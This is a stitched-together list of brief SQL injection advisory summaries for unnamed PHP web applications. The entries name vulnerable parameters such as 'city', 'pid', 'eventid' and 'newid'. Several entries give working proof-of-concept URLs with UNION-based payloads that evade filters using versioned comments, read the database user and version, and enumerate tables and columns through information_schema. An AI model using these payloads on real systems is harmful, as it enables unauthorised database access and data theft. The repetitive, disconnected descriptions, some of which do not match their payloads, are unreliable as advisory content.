The vulnerability allows an attacker to inject SQL commands into the 'pr_id' parameter of the 'jobdetails.php' script. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter.
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: http://localhost/[PATH]/list?city=[SQL]&main_search= -'+/*!01111UNION*/+/*!01111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
The vulnerability allows an attacker to inject SQL commands by sending a maliciously crafted HTTP request to the vulnerable application. The proof of concept sends such a request.
The vulnerability allows users to inject SQL commands into the vulnerable parameter of the application.
The vulnerability allows an attacker to inject SQL commands.... Proof of Concept: http://localhost/[PATH]/event-list?city=[SQL]&main_search=-176'+UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54))--+-
The vulnerability allows an attacker to inject SQL commands by manipulating the 'marital' and 'gender' parameters in the 'search_result.php' script.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: 1) http://localhost/[PATH]/service_detail.php?pid=[SQL] -6'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--+- 2) http://localhost/[PATH]/event_detail.php?eventid=[SQL] -18'++UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6,7--+- 3) http://localhost/[PATH]/news_detail.php?newid=[SQL] -27'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),3,4,5,6--+-
The vulnerability allows an attacker to inject SQL commands into the 'city' parameter of the 'list' page, which can be used to extract information from the database.
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter 'rid1' of the jobsearch_all.php file.
The vulnerability allows an attacker to inject SQL commands into the vulnerable parameter 'id' of the 'other-user-profile.php' page.